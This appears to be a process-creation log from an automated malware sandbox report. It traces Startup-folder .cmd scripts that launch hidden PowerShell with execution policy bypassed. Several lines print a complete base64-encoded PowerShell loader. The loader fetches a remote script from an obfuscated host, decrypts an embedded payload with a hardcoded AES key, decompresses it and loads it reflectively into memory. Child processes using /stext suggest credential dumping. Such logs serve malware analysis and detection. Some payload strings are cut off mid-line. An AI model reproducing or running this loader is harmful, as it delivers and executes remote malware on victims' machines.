                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_e29f9ec9.cmd"
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f7534387.cmd" "
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f7534387.cmd"
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f0ceb41b.cmd" "
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f0ceb41b.cmd"
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2513bab9.cmd" "
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2513bab9.cmd"
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDb
i5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2c46f0ee.cmd" "
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2c46f0ee.cmd"
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b6e52985.cmd" "
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b6e52985.cmd"
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cad7c66e.cmd" "
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cad7c66e.cmd"
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_ff75f7e1.cmd" "
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_ff75f7e1.cmd"
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_d059825f.cmd" "
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_d059825f.cmd"
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\5kldoushde.bat"
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\xdlilvqihrr"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\ixqamojjvzjpuah"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\ixqamojjvzjpuah"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\savtmytdjhbuwgvpuw"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\savtmytdjhbuwgvpuw"
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f1e01fdf.cmd"
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_df859eae.cmd"
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_81f4ce5e.cmd"
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4a774a3c.cmd"
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_25a2536c.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDb
i5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a960cfa7.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDb
i5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNF